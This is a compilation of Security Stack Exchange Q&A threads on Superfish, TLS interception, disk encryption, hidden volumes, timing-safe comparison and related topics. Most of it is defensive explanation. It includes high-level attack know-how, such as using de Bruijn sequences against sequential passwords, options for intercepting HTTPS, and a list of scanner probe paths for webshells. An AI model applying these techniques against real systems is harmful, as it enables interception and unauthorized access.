showstopper. Politics/economics: the CA system has its issues and browsers might be reluctant to pressure site admins to pay them (if they don't otherwise see value in that). Let's ignore money for a moment and pretend Let's Encrypt free CA has arrived. I can see why making the change right now can be controversial; what baffles me is why it's not widely discussed as the obvious long-term goal, with some staged plan a-la the SHA-2 certs deprection though maybe slower. What I see seems to assume http will remain default practically forever: Chrome's move to hiding http:// in URL bar is a step back. The first step towards https default should have been showing http in red; at some later time eventually move to hiding https:// (only showing green padlock)... HSTS moves in the right direction but with cautious per-site opt-in. It's both weaker and stronger — sites opt in to forcing https even for explicit http urls, with no user recourse for errors — but the RFC doesn't even mention the idea that https could be a global default, or that browser default scheme is to blame for bootsrap MITM problem. I've seen DNSSEC mentioned as future vector for HSTS-like opt-in but again never saw proposals for opt-out... Also, are there any browsers (or extensions) offering this as an option? 
| Browsers are applications for end-users.
While the majority of sites is available by http (even if they just redirect to https) a significant part is not available by https.
Thus your proposal would break web surfing for a very large part of the users. It would break in a way they don't understand. Automatically downgrading to http if https fails would not make sense because an attacker could then just simply cause havoc with connections to port 443 to enforce downgrades. Once all but a few insignificant sites switched to https one could make the switch to a more secure default, but not yet. End-users would not understand what happened and probably just switch to an alternate browser or get some tips from somewhere on the internet to get back the old behavior. Security decisions have to be done with and not against the users. | {
"source": [
"https://security.stackexchange.com/questions/81801",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31246/"
]
} |
82,005 | With port knocking, you have to "knock" on specific ports in defined order to expose a port on which service is running. How about password knocking ? For example you have three passwords: A , B and C . None of them is correct by itself, but entered one-by-one in this order they will grant you access. Some scenarios to make this idea clearer: Scenario 1. You: Password A . Server: Invalid password. You: Password B . Server: Invalid password. You: Password C . Server: Password accepted . Scenario 2. You: Password A . Server: Invalid password. You: Password C . Server: Invalid password. You: Password B . Server: Invalid password. Scenario 3. You: Password A . Server: Invalid password. You: Password B . Server: Invalid password. You: Password B . Server: Invalid password. You: Password C . Server: Invalid password. Scenario 4. You: Password A . Server: Invalid password. You: Password A . Server: Invalid password. You: Password B . Server: Invalid password. You: Password C . Server: Password accepted . I can't think of any drawbacks of this method over regular single password login. Moreover, it makes dictionary attacks exponentially harder with each added password. I realize it's security by obscurity and doesn't abolish the need for strong passwords. Password sequence itself is as strong as a concatenation of passwords used. Added security in this method comes from unexpectedly complex procedure. Is it a good idea? Is it a better idea than classic password? | The system outlined in the question is actually weaker than simply requiring a single password of length A+B+C, because it permits a class of attacks that can't be used against single passwords: Say your three-password combination is E F G . An attacker can send the passwords A B C D E F G , making five attacks ( A B C , B C D , C D E , D E F , and E F G ) for the price of two. The general term for this is a de Bruijn sequence , and it lets you attack any state-based system (such as a digital lock) using far fewer tries than there are possible combinations. | {
"source": [
"https://security.stackexchange.com/questions/82005",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68614/"
]
} |
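A small sketch of why the attack described above is so cheap: since the server only checks the trailing window of entries, every additional password the attacker sends completes a brand-new candidate sequence (the letters are illustrative):

```python
def sequences_tested(stream, length=3):
    """All consecutive `length`-password windows covered by sending `stream`."""
    return [tuple(stream[i:i + length]) for i in range(len(stream) - length + 1)]

attack_stream = ["A", "B", "C", "D", "E", "F", "G"]
for attempt in sequences_tested(attack_stream):
    print(attempt)
# Seven passwords sent, but five distinct three-password sequences tested:
# (A, B, C), (B, C, D), (C, D, E), (D, E, F), (E, F, G)
```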
82,035 | There has been quite a bit of concern noted relating to the recent discovery that Lenovo are pre-installing a piece of Adware (Superfish) which has the capability of intercepting SSL traffic from machines on which it is installed. What are the security risks of having OEMs or other companies installing this kind of software onto customers systems? | Having a proxy SSL certificate creates some privacy and security implications: Superfish can impersonate any site This does not mean that Superfish will do it (or is doing), but they have the power. As they have a Certification Authority Certificate , any certificate they generate will be valid and accepted. Certificate pinning does not protect you , either: "There are a number of cases where HTTPS connections are intercepted
by using local, ephemeral certificates. These certificates are signed
by a root certificate that has to be manually installed on the client.
Corporate MITM proxies may do this, several anti-virus/parental
control products do this and debugging tools like Fiddler can also do
this. Since we cannot break in these situations, user installed root
CAs are given the authority to override pins. We don't believe that
there will be any incompatibility issues." If you use Windows and EMET, Certificate Trust can protect you IF you configure it beforehand. But the process is manual and somewhat complicated. Superfish can intercept traffic As a trusted CA, Superfish can perform a MiTM attack on any site, and the average user will not detect the attack. Savvy users can see that the certificate was signed by a strange CA, if they know where to look. Superfish can inject code anywhere Even if the site is protected by SSL/TLS, Superfish can inject Javascript or HTML on every page. They just proxy the requests, make the request to the intended server, read the response, inject data, and send data to the user. And unless you are looking for it, you will never notice. Superfish can be used to install malware Like above, Superfish can add code to Windows updates, alter executables being downloaded, infect Java applets, Flash files and so on. Any download could be silently compromised. They could even change the origin site and put changed checksums on it, so even if you calculate the hash after downloading the files, they would look legit. Superfish can know every site you access The software monitors your browser and send data to Superfish. Even without the software, they can inject code on every site and track you everywhere. Anyone on the web can use its certificate The private key of the certificate has been compromised , so anyone knowing the key can use Superfish certificate to create valid SSL certificates for anything they want. Saying that they can does not mean or imply that they will , only that they have the power to do if they want (or are forced to). | {
"source": [
"https://security.stackexchange.com/questions/82035",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37/"
]
} |
82,056 | The site already has a discussion of the security risks of "Superfish". It seems to me that anything that tampers with the bits of one's connection is bad. If it tampers with TLS connections, it is evil. How can I determine if I am vulnerable to Superfish? Lenovo has issued a statement on Superfish (after they got caught red-handed) saying it has been "disabled." As I can no longer trust Lenovo, is there a way to remove it completely other than format c: ? Edit: the Lenovo statement linked above now has a list of model numbers on which Superfish may have been installed. Um, but it says "appeared" rather than "installed," rather like it sneaked on those computers in the middle of the night. | You can check to see if your machine is vulnerable by browsing to this site: https://badssl.com/dashboard/ Everyone keeps saying that you need to completely reinstall a clean version of Windows. I would try to remove Superfish first. To remove the executable you should be able to use the normal Windows Add/Remove programs method. I believe the executable is called Visual Discovery. To remove the certificate follow these steps from StackOverflow : FYI, this Superfish software is now a major news headline: http://arstechnica.com/security/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/ It is preloaded by Lenovo (there may be other vendors). You have to
uninstall it, but that will not remove the certificate. To remove the
certificate, you must do the following: Run mmc.exe Go to File -> Add/Remove Snap-in Pick Certificates, click Add Pick Computer Account, click Next Pick Local Computer, click Finish Click OK Look under Trusted Root Certification Authorities -> Certificates. Find the one issued to Superfish and delete it. If you are really paranoid, the best solution would be to reformat
your laptop and install Windows with Microsoft media, not the factory
recovery stuff. While the above removes it from the Microsoft Trusted Store, this link indicates that the root certificate might be injected into browser trusted stores. Check that your browser also does not trust the Superfish Inc certificate. Chrome and IE both use the operating system's trusted root store. If you're using FireFox you need to manually remove it. Remove Trusted CA from FireFox Trusted Store Click the menu button, then choose Preferences Click the Advanced in the upper tab menu Then click Certificates in the lower tab menu. Click View Certificates Under the Authorities tab check for the Superfish Inc certificate If it's found, then click on the certificate and then click Delete or Distrust Finally click the Ok button to confirm that you're removing it. | {
"source": [
"https://security.stackexchange.com/questions/82056",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52741/"
]
} |
82,113 | Robert Graham detailed on the Errata Security blog how he was able to get the private key of the Superfish certificate. I understand that attackers can now use this key to generate certificates of their own which will be signed by the Superfish CA. Won’t the same attack work on other root certificates already on a computer? Why was the private key on the computer in the first place? | Unless the Superfish malware has been installed on your system, (which it might if you bought a Lenovo machine,) you don't have to worry. This attack worked because the secret it revealed was necessary for the malware to hijack the data; it is not a part of how legitimate certificates are authenticated. It helps to understand the relationships between a certificate, a public key, and a private key. A private key is a secret number used to sign messages with digital signatures (or to encrypt web traffic), and it has a matching public key that can be used to verify those signatures. A certificate is a public document that contains a public key; web site owners put their public keys onto certificates and send them to companies called Certificate Authorities (CAs) who digitally sign them to prove their certificates are genuine. The digital signatures ensure the document has not been changed, assuring you the public key it contains is the genuine key of the site you're visiting. CAs are companies everyone agrees to trust to only sign certificates from legitimate sources. They also have a private and public key pair. They keep the private key very secret, locked in a secure cryptographic device called a Hardware Security Module (HSM) and they restrict access to it so it can only be used to sign a customer's certificate when the customer generates a new key. But in order to be useful, everyone on the web needs to know their public keys. So these CAs put their own public key on a special certificate and sign it with their own private key ("self-signing"). They then send these self-signed "root certificates" to the browser vendors and OS vendors, who include them with their products. A real CA would never, ever, send out their private keys! The trusted authority root certificates are the documents that validate all the certificates of all the connections your computer makes. Thus, your computer has to trust them. This malware is installing an untrustworthy certificate in a position of ultimate trust, compromising the security of the machine by allowing anyone who knows this key to forge a certificate for any site, hiding evidence of their tampering. The malware abuses its position by generating phony public and private keys for every site you visit; after you connect it injects its payload into the web site's page. In order for your browser to trust these phony keys and not give you warnings, the malware generates a forged certificate that tricks your browser into believing the keys are legitimate. But like any certificate, the forgery needs to be signed by a trusted CA. To sign, the malware needs a public and private key, just like a real CA. Because the phony CA is forging these certificates right inside your computer, the private key needs to be inside your computer as well. It's impossible to keep such things secret from the owner of the computer, but they tried by taking some rudimentary steps to hide it. The blog you linked to described how he uncovered the secret. 
No legitimate certificate authority would ever allow their private key to be leaked, much less send it out to a bunch of random computer owners. There was a case where a certificate authority had their secret key leaked; their reputation was ruined and they went bankrupt in a month. Since your computer doesn't contain the private keys of the legitimate certificate authorities, there is no secret for an attacker to crack. | {
"source": [
"https://security.stackexchange.com/questions/82113",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8772/"
]
} |
82,362 | A scene in the documentary CitizenFour showed Snowden using a blanket to cover his head and the laptop screen. When asked by Greenwald about this, he answered affirmatively, but I couldn't really understand what Greenwald meant/said. What was Snowden mitigating by that action? | The Background The general situation was Snowden entering his password at that time, and he wanted to mitigate visual surveillance, be it by observation or (hidden) cameras. It seems Snowden didn't trust anything but his own laptop (if at all) during these first day(s) of contact with the journalists. He also offered the blanket to the others in the room when they were entering their credentials into their laptops, but they refused, probably regarding this as being overcautious. The Exact Scene (Original footage from Citizenfour by Laura Poitras) 37:35 [Snowden pulling blanket over his head/laptop] 37:44 Greenwald: Is that about the possibility of... 37:47 Snowden [still under blanket, interrupts]: visual, yeah, visual collection 37:50 [Greenwald looking around the room, seemingly not quite sure what to think and say] 37:55 Greenwald: I don't think at this point there is anything in this regard that will shock us. [laughter in room] Some general chit-chat about never leaving devices alone any more follows. | {
"source": [
"https://security.stackexchange.com/questions/82362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47050/"
]
} |
82,408 | I have to log in on an HTTP website. There is a login form which contains inputs for username and password and as hidden inputs the sessionId. I am creating an application in which I have to access resources which just can be accessed if you are logged in on this website, so I provide a username and password input in my application to log in. I watched the HTTP requests now, and the HTTP POST request in which the login data is sent has the parameters password and username, so I could see my username and password in Fiddler non-encrypted, but I don't want to send my data unprotected. If the parameters of an HTTP POST request can be seen by tools like Fiddler in the clear, does this mean that my data is sent without any encryption to the server? Or is there any kind of encryption that is done which just isn't visible to me? | Ordinary HTTP of all sorts is unencrypted. If you want to protect your data, it has to be sent over HTTPS. | {
"source": [
"https://security.stackexchange.com/questions/82408",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68987/"
]
} |
82,596 | I am running a web server and watching what people request. I have been getting frequent traffic like: GET /phph/php/ph.php HTTP/1.1 or GET /mrmr/mrm/mr.php HTTP/1.1 Are these scans? Are the clients checking if my server is already compromised or are they checking if I am vulnerable? As far as I can tell, since I don't host such directories, such traffic is a scan for compromised machines; I do not know for sure because I think it unsafe to click the links Google provides when I search such things. | These types of spurious requests are very, very common. They are either looking to see if you are already compromised, or looking to get your server to throw an error to gather info about your server (from error messages). You aren't the only one: http://shadow.wolvesincalifornia.org/awstats/data/awstats092014.shadow.wolvesincalifornia.org.txt # URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 193
/admin.php 1 -
/root/back.css 1 -
/drdr/drd/dr.php 2 -
/hkhk/hkh/hk.php 1 -
/wp/2011/07/19/& 6 -
/ahah/aha/ah.php 1 -
/andro/back.css 1 -
/wp/comments/feed/ 1 -
/wjwj/wjw/wj.php 1 - We all get spammed by these requests. | {
"source": [
"https://security.stackexchange.com/questions/82596",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40706/"
]
} |
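If you want to keep an eye on how much of this probing your own server sees, here is a rough sketch that tallies 404 probes from a common/combined-format access log; the log path and regex are assumptions — adjust them to your server:

```python
import re
from collections import Counter

LOG_FILE = "/var/log/apache2/access.log"  # adjust to your server's log location
probe = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" 404 ')

counts = Counter()
with open(LOG_FILE, encoding="utf-8", errors="replace") as log:
    for line in log:
        match = probe.search(line)
        if match:
            counts[match.group(1)] += 1

# The most frequently requested non-existent paths are almost always
# automated scanner noise like the /phph/php/ph.php requests above.
for path, hits in counts.most_common(15):
    print(f"{hits:5d}  {path}")
```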
82,777 | I can't think of a reason as to why you'd want to create a hidden volume in VeraCrypt. It says because "you may be asked to hand the information," but why would I need to hand it over? Nobody has any proof of what may or may not be in that volume, so they can't claim that I'm doing something unlawful (assuming I was), because they literally have no proof of absolutely anything. Hence, they cannot make me hand over the password nor can they penalize me for defending my privacy and refusing to hand over my personal files without any proof that those files are somehow harmful (or whatever you wanna call it). Also, if you have to hand it over, it doesn't make sense that while there is 500mb/700mb occupied space when the files there only take 300mb. Where did the other 200mb go? ...But let's focus on #1, as that - in my opinion - is a more important point that just obliterates the suggested reason, far as I can figure. | Your first question is really a legal one, and you seem to be assuming two things: The attacker is a government of some sort. That government actually respects citizen privacy and requires some sort of reasonable suspicion before it can force people to give up encryption keys. Neither of those assumptions are necessarily true. For all you know, some random thief could grab your laptop while you are using it, notice a VeraCrypt file sitting on the desktop, and pull out a gun and force you to decrypt it. It's not super realistic, but definitely possible. And even if it is indeed a government, not all countries have privacy protections or require reasonable suspicion. Even in ones that do (e.g. US and many European countries), there have been lots of cases where courts have forced people to supply their decryption keys because it is deemed relevant to an investigation. Whether they have the authority to do so is a subject of current debate, especially in the US where there is supposed to be protection against self-incrimination. Here is one such case: http://www.cnet.com/news/judge-americans-can-be-forced-to-decrypt-their-laptops/ For your second question, try it out yourself: Create a 500mb outer volume, containing a 300mb hidden volume. Completely fill the hidden volume with files. Then mount the outer volume. The outer volume will still show 500mb of free space. How does this work? The idea is that you're never supposed to write to the outer volume once you have created it, as doing so could corrupt your hidden volume. If you open the outer volume, even veracrypt does not know that the hidden one exists. There is no way to tell that a hidden volume exists because the hidden volume is indistinguishable from free space (which is why veracrypt still shows 500mb free space when you mount the outer volume). That's the whole idea of plausible deniability; there is no technical way to prove that there is more encrypted data. | {
"source": [
"https://security.stackexchange.com/questions/82777",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69389/"
]
} |
82,910 | After upgrading to Android L on my Nexus 5, I was pleased to find that I can enable encryption using a pattern as the passphrase. However, it soon got me thinking. I'm guessing the encryption key is ultimately derived from the pattern which is very low entropy. I did a back-of-the-envelope calculation and I found that the total number of unique patterns on a 3x3 grid of dots come to just under a million. Even at 0.1 guesses per second, it would take a mere 115 days to search the entire keyspace. I started reading around and discovered a write-up detailing how Android does disk encryption . It seems to claim that Android L will use hardware-backed secure storage for storing and deriving the encryption key so it can essentially allow low entropy passphrases to still have the same amount of security. However, I don't quite understand why. Why does using a hardware-backed secure storage device suddenly allow low entropy passphrases to acheive strong security? Am I just missing something blatantly obvious? | Chip-based banking cards typically use a 4-digit PIN. It would take at most a few hours to try them all if the card didn't protect against brute force attempts. The card protects against brute force attempts by bricking itself after 3 consecutive failures. The adversary does not have access to a hash of the PIN (there are physical protections in the card that make it extremely hard to read its memory), but only to a black box that takes 4 digits as inputs and replies “yes” or “no”. The key to security here is that the adversary can only make online attempts, not offline attempts . Each attempt requires computation on the defending device, it is not just a matter of doing the math. An Android phone or any other computer can do the same thing with its storage encryption key. The key is not derived from the passphrase (or pattern), but stored somewhere and encrypted with the passphrase. Most storage encryption systems have this indirection so that changing the passphrase doesn't require re-encrypting the whole storage, and so that the storage can be effectively wiped by wiping the few bytes that make up encrypted key (the storage encryption key is uniformly random, so unlike a key derived from a passphrase it isn't subject to brute force: the adversary needs to obtain at least the encrypted storage key to gain a foothold). If the adversary can read the encrypted storage key, then they can make fast brute force attempts on the key on a cluster of PCs. But if the storage key is stored in tamper-resistant storage, then the adversary is unable to read it and can only submit passphrase attempts to the device, so the device can apply policies like “limit the rate of attempts to 3 per minute” or “require a second, longer passphrase after 10 failed attempts”. The new feature in Android L is upstream support for an encrypted storage key that isn't stored on the flash memory (from which it can be dumped with a bit of soldering or with root access), but instead in some protected memory (which may be accessible to TrustZone secure mode only ). Not all phones running Android L have such protected memory however, and even if it's present, there's no guarantee that it's used for the encryption. All Android L changes is providing the requisite code as part of the basic Android image, making it easier for phone vendors to integrate. Android provides an API to check whether the application keychain storage is in protected memory ). 
I don't know if there's a corresponding API to check the protection of the storage encryption key. | {
"source": [
"https://security.stackexchange.com/questions/82910",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12626/"
]
} |
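A toy sketch of the distinction the answer above is drawing: because the verifier runs on the device (which alone can reach the protected storage key), it can enforce a policy on every guess instead of letting the attacker compute offline. This is conceptual only, not how Android's hardware-backed keystore is actually implemented:

```python
import time

class UnlockGuard:
    """Accepts pattern/PIN guesses and enforces an online rate-limit policy."""

    def __init__(self, verify_guess, max_failures=30):
        self.verify_guess = verify_guess  # e.g. a check done in protected hardware
        self.failures = 0
        self.max_failures = max_failures

    def try_unlock(self, guess) -> bool:
        if self.failures >= self.max_failures:
            raise RuntimeError("too many failures: require full passphrase or wipe key")
        if self.failures:
            time.sleep(20)  # roughly "3 attempts per minute"
        if self.verify_guess(guess):
            self.failures = 0
            return True
        self.failures += 1
        return False
```

With roughly a million possible 3x3 patterns and a forced 20-second wait per wrong guess, exhausting the keyspace online takes months rather than seconds, which is why the low-entropy pattern becomes tolerable when the key never leaves protected storage.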
83,026 | In the documentary film Citizenfour , Edward Snowden says about documents: I'm comfortable in my technical ability to protect [documents].
I mean you could literally shoot me or torture me
and I could not disclose the password, even if I wanted to.
I have the sophistication to do that. What technology/methods exist that would enable the scenario Edward Snowden is referring to when he claims to be able to create a protected file where he cannot disclose the password? | All of our answers are speculation, of course, but I suspect that the most likely way that the documents are protected are by following Bruce Schneier's advice regarding laptop security through airports: Step One: Before you board your plane, add another key to your
whole-disk encryption (it'll probably mean adding another "user") --
and make it random. By "random," I mean really random: Pound the
keyboard for a while, like a monkey trying to write Shakespeare. Don't
make it memorable. Don't even try to memorize it. Technically, this key doesn't directly encrypt your hard drive.
Instead, it encrypts the key that is used to encrypt your hard drive
-- that's how the software allows multiple users. So now there are two different users named with two different keys:
the one you normally use, and some random one you just invented. Step Two: Send that new random key to someone you trust. Make sure the
trusted recipient has it, and make sure it works. You won't be able to
recover your hard drive without it. Step Three: Burn, shred, delete or otherwise destroy all copies of
that new random key. Forget it. If it was sufficiently random and
non-memorable, this should be easy. Step Four: Board your plane normally and use your computer for the
whole flight. Step Five: Before you land, delete the key you normally use. At this point, you will not be able to boot your computer. The only
key remaining is the one you forgot in Step Three. There's no need to
lie to the customs official; you can even show him a copy of this
article if he doesn't believe you. Step Six: When you're safely through customs, get that random key back
from your confidant, boot your computer and re-add the key you
normally use to access your hard drive. And that's it. This is by no means a magic get-through-customs-easily card. Your
computer might be impounded, and you might be taken to court and
compelled to reveal who has the random key. To be even more secure, Snowden himself may not know who has the backup key--as the associate he gave it to may have passed it along elsewhere. Also, it is likely that the person that did receive the backup key from Snowden is in a different country than any likely attacker and is doing his or her best to stay very safe. EDIT: In response to the below comment, I decided to add the following advice: Create a dummy operating system that starts at the beginning of the laptop's hard drive. The encrypted operating system with sensitive information will be the following partition. Configure the laptop's bootloader to boot from the dummy operating system without your intervention. TrueCrypt had a similar hidden operating system feature where the TrueCrypt bootloader would accept two different passwords, giving access to two different operating systems. The hidden operating system was concealed with a bit of clever steganography. We can do something similar in Linux and LUKS, but without the steganography, by doing the following: Installing Linux twice--on two partitions. Encrypting both of them with LUKS. Configuring the bootloader (probably GRUB2) to boot the first Linux installation, and remove the entries for the second installation . Whenever you want to boot your second, secret installation, boot your laptop and reach the GRUB screen. Modify the bootloader entry (temporarily) directly from the boot screen to point to the second partition. Step four is not very user friendly, and we could get rid of it and make a separate bootloader entry for our secret operating system, but then anybody that looked at the screen could tell that there are two operating systems on the machine. An investigator can still tell, but now they must look at the laptop's hard drive with a partition editing tool. | {
"source": [
"https://security.stackexchange.com/questions/83026",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69607/"
]
} |
83,028 | My goal is to sniff the HTTPS traffic of some digital devices (AppleTV, game consoles, etc.), and decrypt the HTTPS packets in my local network. I cannot figure out a way by using some HTTPS debugging proxy tools like Charles or Fiddler, because they need to have a certificate installed on the device. I don't have access to the file system on the device, I cannot copy certificate. But I can set the proxy of the device to point to my laptop or using my laptop's hotspot. | The entire point of SSL is its resistance to eavesdropping by man-in-the-middle attacks like the one you're proposing. If you cannot make the client device trust your self-signed certificate, then your only options are: Intercept an initial HTTP request and never let the communication be upgraded to HTTPS (but this will not work if the if the client explicitly goes to an https://... URL) Pretend to be the server with your own self-signed certificate, and hope that the system making the request naively accepts a self-signed certificate (which is the decision-making equivalent to a user who ignores the browser's stern warnings about a possible MITM attack in progress) Check for susceptibility to known past attacks on SSL (Heartbleed, BEAST, etc.). Note that this option is most likely to be illegal, since it may require an attack on the server (which you don't own) rather than an attack on the client (which you do possibly do own) If you have many trillions of dollars available to you, you may have a few other options: Successfully compromise a worldwide-trusted certificate authority and use their secret signing key to produce forged certificates for your own keypair Purchase or discover a zero-day security vulnerability in a Web client, Web server, or (most preferably) SSL/TLS library used by the client or server Discover a crippling weakness in some underlying cryptographic primitive used by SSL (for example, completely breaking AES might do nicely) Spend trillions of dollars on computer hardware to perform brute force attacks on intercepted encrypted communications If you have unlimited physical access to the device, almost certainly an attack on the device's own trusted certificate store would be easier than an attack on SSL (though it may also be far from easy). | {
"source": [
"https://security.stackexchange.com/questions/83028",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69612/"
]
} |
83,362 | I just discovered that someone is pointing their domain name to the server I use for a website, which results in traffic to their domain displaying the content of my website. How can I stop this illegitimate use of content? | The answer depends on the web-server you are using. For example, apache allows for the creation of multiple virtual hosts, of which the first described is considered the default one. What I suggest to do, is to create this default "catch-all" virtual-host with a global deny rule on it. Then configure your own web-site with a virtual-host identified with your domain name. Therefore, any request coming in with a domain not matching your shall be denied access (404 I suppose). An other thing you could do is get the "whois" information on said domain, ISP usually list in the records an email address to report abuse. Collect some information from your logs and ask the provider to terminate this. | {
"source": [
"https://security.stackexchange.com/questions/83362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64130/"
]
} |
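The answer above describes the Apache-specific fix (a default, catch-all virtual host that denies everything). As a self-contained illustration of the same idea, here is a Python standard-library sketch; the hostnames are placeholders, and a real deployment would normally enforce this in the web server configuration rather than in application code.

# Minimal illustration of "serve only my own hostname, deny everything else"
from http.server import BaseHTTPRequestHandler, HTTPServer

ALLOWED_HOSTS = {"example.org", "www.example.org"}  # placeholder names

class HostCheckingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host = (self.headers.get("Host") or "").split(":")[0].lower()
        if host not in ALLOWED_HOSTS:
            self.send_error(404)  # someone else's domain pointed at this server
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"legitimate site content\n")

if __name__ == "__main__":
    HTTPServer(("", 8080), HostCheckingHandler).serve_forever()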
83,365 | If we suppose that an attacker has a zero-day vulnerability for a major browser, and can exploit this vulnerability. How can a Linux/Ubuntu user secure themselves from downloading malware (like keyloggers or other stuff that can can access to user's OS / escalate privileges) and gain execution a user's system? | The answer depends on the web-server you are using. For example, apache allows for the creation of multiple virtual hosts, of which the first described is considered the default one. What I suggest to do, is to create this default "catch-all" virtual-host with a global deny rule on it. Then configure your own web-site with a virtual-host identified with your domain name. Therefore, any request coming in with a domain not matching your shall be denied access (404 I suppose). An other thing you could do is get the "whois" information on said domain, ISP usually list in the records an email address to report abuse. Collect some information from your logs and ask the provider to terminate this. | {
"source": [
"https://security.stackexchange.com/questions/83365",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68546/"
]
} |
83,386 | I have a USB drive encrypted with BitLocker Drive Encryption. Each time I insert the drive in my USB port it works as expected, requires me to enter the password. Maybe I have the BitLocker Drive Encryption configured wrong or something not sure but, after inserting the USB drive and entering my password I can go to a completely different PC with a different network ID etc on the same network I'm able to see everything on my thumb drive. Not only can I see everything from other PCs I can write to it delete etc. I thought it would have required me to enter my password when I mapped to it from a different PC. Can anyone explain why other PCs can map to my encrypted drive and have full access to everything? | You’re misunderstanding what BitLocker is supposed to protect against. The goal of BitLocker is to protect your data from cold boot attacks (as explained in a Technet blog entry ). When you unlock a volume protected by BitLocker, the system gains access to the keys necessary to decrypt the drive and behaves as if it was a regular drive. That is necessary to make the system compatible with any and all applications (and drivers) without requiring them to know about BitLocker. (That’s why it’s called transparent disk encryption: applications and drivers don’t see it.) This means you’re free to share the volume over the network and, if you carelessly apply no kind of ACL restriction on who can access the data, then everyone can access it freely. | {
"source": [
"https://security.stackexchange.com/questions/83386",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69273/"
]
} |
83,393 | How can I prevent network administrators from accessing, mapping to etc. a USB drive that's in a PC on their network? I'm mainly concerned about files being edited or deleted. | You effectively can't. If you're on somebody else's machine and they have administrative rights to it, then that's the game. The quite fancy answer be mandatory access control systems like SELinux which hold a concept higher than root that would at least require a reboot and direct system access to change the settings. | {
"source": [
"https://security.stackexchange.com/questions/83393",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69273/"
]
} |
83,610 | My friends have expressed an interest in hacking, but we don't want to do anything illegal, and considered CTF365, but it was WAY to expensive. Is it possible/legal for one of us to create a private website for us to hack, or play attack/defend with two websites of our own? | To the best of my knowledge, yes, it's legal. Every anti-hacking law I'm aware of refers to unauthorized access, and if you've got permission to hack it, it's not unauthorized, is it? Note that there are some things you'll need to watch out for. Some jurisdictions prohibit the possession of "hacking tools" (akin to prohibiting possession of lockpicks, but less well-defined), and some techniques, such as packet spoofing or (D)DoS, can have collateral damage that would fall afoul of the law. You'll also want to check your webhost's opinion of what you're doing. They may not permit this because of possible effects on other customers; if you're hosting the website on your home connection, you might be violating your ISP's terms of service. If you want to be completely safe, do this on a dedicated network that is isolated from the Internet entirely. A cheap Ethernet switch and a Raspberry Pi or two can get you a setup you can play with for under $100. | {
"source": [
"https://security.stackexchange.com/questions/83610",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70097/"
]
} |
83,614 | Both the sender and the receiver deleted the text after it was sent, but is it still possible that it exists somewhere and that someone can get to it? | It is absolutely not secure. Text messages function essentially the same way email does: your client (phone) forwards it to a server, which then looks up a destination which may be on another network (carrier) and then sends it over where it is held in a mailbox until a phone gets it. Anywhere along the way it can be copied, retained longer than expected, etc. Lawful interception, unlawful interception, cloned phones, Google+ accounts, etc are all ways a message can end up somewhere unexpected and all that assumes you trust the phone and software on it. Clear text is compromised text. Always. | {
"source": [
"https://security.stackexchange.com/questions/83614",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70103/"
]
} |
83,641 | While visiting some https websites (like online banks, etc) url string appear to have little extra green box on the left hand side, with some organisation details. While other https websites just show a padlock see example pic. Why is that, and whats the difference. | The basic distinction is between a certificate verifying control of a domain, and a certificate verifying the real-world entity behind the domain. With a standard SSL certificate, all that's verified is that the entity with the certificate legitimately controls that domain. It doesn't mean that that's the entity I think it is; I could register bankofamerica.co, and I can then legitimately get a domain-validated certificate for it, and that would show up as a green lock in browsers. What that box indicates is that CAs have done more validation; EV certificates (the green box) generally require actually verifying the existence and name of the business requesting them. I could not get an EV certificate for that site that says "Bank of America" on it, because I don't have a company called Bank of America, and even if I did the actual person reviewing an EV cert application (unlike normal certs, EV certs aren't automated) would likely be somewhat suspicious at someone claiming to be a bank. So that's the stated role of EV certs: Verifying that the server sending you a webpage is the correct server for that domain doesn't really help unless you also know that the domain is owned by the company you want to interact with. With Google and Facebook, you know already that their websites are google.com and facebook.com, so I know that I want to talk to google.com, and if I'm talking to the real google.com that's enough. With other organizations, it's not necessarily enough to know I'm talking to the real so-and-so.com; I also need to know so-and-so.com is the actual website I want to be talking to. | {
"source": [
"https://security.stackexchange.com/questions/83641",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70138/"
]
} |
83,660 | As I learned in a comment for How to encrypt in PHP, properly? , I was told using a string comparison like the following in PHP is susceptible to timing attacks. So it should not be used to compare two MACs or hashes (also password hashes) for equality. if ($hash1 === $hash2) {
    //MAC verification is OK
    echo "hashes are equal";
} else {
    //something bad happened
    echo "hash verification failed!";
} Can someone please explain what exactly the problem is, what an attack would look like, and possibly provide a secure solution that avoids this particular problem.
How should it be done correctly? Is this a particular Problem of PHP or do other languages like e.g. Python, Java, C++, C etc. have the same issues? | I will add a list with time constant functions for different languages: PHP : Discussion: https://wiki.php.net/rfc/timing_attack bool hash_equals ( string $known_string , string $user_string ) http://php.net/manual/en/function.hash-equals.php Java Discussion : http://codahale.com/a-lesson-in-timing-attacks/ public static boolean MessageDigest.isEqual(byte[] digesta, byte[] digestb) http://docs.oracle.com/javase/7/docs/api/java/security/MessageDigest.html#isEqual(byte[],%20byte[]) C/C++ Discussion: https://cryptocoding.net/index.php/Coding_rules int util_cmp_const(const void * a, const void *b, const size_t size)
{
    const unsigned char *_a = (const unsigned char *) a;
    const unsigned char *_b = (const unsigned char *) b;
    unsigned char result = 0;
    size_t i;
    for (i = 0; i < size; i++) {
        result |= _a[i] ^ _b[i];
    }
    return result; /* returns 0 if equal, nonzero otherwise */
}
